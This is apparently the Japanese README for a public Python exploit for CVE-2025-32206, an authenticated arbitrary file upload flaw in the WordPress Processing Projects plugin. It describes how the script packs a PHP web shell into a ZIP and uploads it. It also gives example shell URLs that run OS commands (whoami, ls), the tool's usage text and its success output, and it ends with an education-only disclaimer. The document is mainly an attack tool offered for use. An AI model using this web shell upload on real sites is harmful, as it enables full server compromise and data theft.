
WordPress Processing Projects Plugin バージョン 1.0.2 以下は任意ファイルアップロードの脆弱性があります。
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H「LABCAT Processing Projectsにおける危険なタイプのファイルの無制限アップロードの脆弱性により、攻撃者はWebサーバーにWebシェルをアップロードできます。これにより完全な侵害につながる可能性があります。」
このPythonエクスプロイトスクリプトは、脆弱性のあるProcessing Projectsプラグイン(バージョン<=1.0.2)を使用しているWordPressサイトを対象としています。このプラグインは認証されたユーザーからのファイルアップロードを適切に処理せず、実行可能なPHPコード(Webシェル)を含む任意のZIPファイルをアップロードできるようにします。
エクスプロイトスクリプトの動作:
Nxploit.php)を含むZIPファイル(Nxploited.zip)を作成します。http://target.com/wp-content/uploads/processing-projects/Nxploit.phpシェルが正常にアップロードされると、cmdパラメータを介してシステムコマンドを実行できます。例:
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
このシェルは任意のOSコマンドを実行し、その出力を直接レスポンスに返します。
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g. http://target.com/wordpress)
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi
[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php
このスクリプトは教育目的のみで提供されています。所有していない、またはテストの明示的な許可がないシステムでこのエクスプロイトを無断使用することは違法かつ非倫理的です。
常に責任ある開示慣行に従い、このツールは管理された環境または明示的な許可がある場合にのみ使用してください。
By : Nxploited | Khaled Alenazi